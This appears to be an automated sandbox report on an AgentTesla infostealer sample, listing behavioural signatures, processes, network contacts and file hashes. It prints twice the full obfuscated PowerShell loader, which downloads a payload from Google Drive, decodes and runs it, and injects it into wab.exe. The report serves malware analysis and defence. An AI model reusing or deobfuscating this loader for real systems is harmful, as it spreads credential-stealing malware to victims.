memory/2608-367-0x00000000009A0000-0x00000000009E2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 14:49
Reported
2024-06-19 14:51
Platform
win10v2004-20240226-en
Max time kernel
144s
Max time network
151s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3632 set thread context of 2992 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle 1 "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=752 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | 5268416cacbeffd708e75a64a1cb2036 |
| SHA1 | 50d9ad3cefa4b430903e7f1e527c3995b0ee3f7f |
| SHA256 | 7926f95348277654cbae2c84a5562a003fd308245e5a2d9a031bba7bd0d0c736 |
| SHA512 | bc3e355cd36ab9aa43c6156836250ad6d9217aebf7585a11057d462d11d0e1c2c0c4231f1bfaec58baffd6015a9a525d4b1f9cf39aea780ce2c34f69d700e6b4 |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | efff69aad6f8946d6499b060b419aa81 |
| SHA1 | 530aa1bdae43c5f072c115b2fe91961538b60640 |
| SHA256 | 6bd5f8250d34b23ed5c512f9c999e035b6c1d225d285ffa04633000ccac9d0a2 |
| SHA512 | 2fd66e4bdc2286a58b4bb5f5f7f57983f65054512fad479d216f11abc7e64c22f797e7bf89368e12dfbc732068f084e297d443f3dee228c83826c4d9c088413e |
C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt
| MD5 | b7874067dccb9132ddf6a88979ae2c18 |
| SHA1 | cb1065a2c0aa83bf9f136ed2ebfe4b68c52c9bf7 |
